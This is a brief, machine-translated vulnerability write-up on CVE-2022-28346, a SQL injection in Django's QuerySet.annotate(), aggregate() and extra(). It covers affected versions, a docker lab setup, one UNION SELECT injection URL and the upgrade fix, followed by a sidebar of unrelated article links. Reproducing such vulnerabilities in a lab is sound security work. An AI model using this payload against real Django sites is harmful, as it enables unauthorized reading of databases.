当前位置:网站首页>Cve-2022-28346: Django SQL injection vulnerability
Cve-2022-28346: Django SQL injection vulnerability
2022-07-08 00:41:00 【yggcwhat】
0x01 brief introduction
Django Yes, it is Python Developed a free open source Web frame , It almost covers Web Every aspect of application , Can be used to quickly build high performance 、 Elegant website ,Django It provides many modules often used in website background development , Enable developers to focus on the business part .
0x02 Summary of vulnerability
Hole number :CVE-2022-28346
Attackers use a carefully crafted dictionary , adopt **kwargs Pass to QuerySet.annotate()、aggregate() and extra() These methods , This can cause these methods to be affected by SQL Injection attack .
0x03 Affects version
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 Environment building
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 Loophole recurrence
You can find out which interfaces exist through the error reporting page
If the access interface has parameters , The error message will also be prompted
Use the parameters of the error prompt sql Inject
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 Repair method
The Security version has been officially released , Download address :
https://www.djangoproject.com/download/
边栏推荐
- v-for遍历元素样式失效
- 去了字节跳动,才知道年薪 40w 的测试工程师有这么多?
- 基于卷积神经网络的恶意软件检测方法
- Huawei switch s5735s-l24t4s-qa2 cannot be remotely accessed by telnet
- [Yugong series] go teaching course 006 in July 2022 - automatic derivation of types and input and output
- ReentrantLock 公平锁源码 第0篇
- 炒股开户怎么最方便,手机上开户安全吗
- Development of a horse tourism website (optimization of servlet)
- Summary of the third course of weidongshan
- 【愚公系列】2022年7月 Go教学课程 006-自动推导类型和输入输出
猜你喜欢
Codeforces Round #804 (Div. 2)(A~D)
QT establish signal slots between different classes and transfer parameters
Qt不同类之间建立信号槽,并传递参数
Service Mesh介绍,Istio概述
测试流程不完善,又遇到不积极的开发怎么办?
SDNU_ACM_ICPC_2022_Summer_Practice(1~2)
Kubernetes Static Pod (静态Pod)
国外众测之密码找回漏洞
华为交换机S5735S-L24T4S-QA2无法telnet远程访问
What has happened from server to cloud hosting?
随机推荐
【测试面试题】页面很卡的原因分析及解决方案
fabulous! How does idea open multiple projects in a single window?
[OBS] the official configuration is use_ GPU_ Priority effect is true
1293_FreeRTOS中xTaskResumeAll()接口的实现分析
Cause analysis and solution of too laggy page of [test interview questions]
攻防世界Web进阶区unserialize3题解
Su embedded training - day4
redis你到底懂不懂之list
Service Mesh的基本模式
赞!idea 如何单窗口打开多个项目?
基于人脸识别实现课堂抬头率检测
Flask learning record 000: error summary
爬虫实战(八):爬表情包
NVIDIA Jetson测试安装yolox过程记录
炒股开户怎么最方便,手机上开户安全吗
ReentrantLock 公平锁源码 第0篇
Scrapy framework
Which securities company has a low, safe and reliable account opening commission
测试流程不完善,又遇到不积极的开发怎么办?
攻防演练中沙盘推演的4个阶段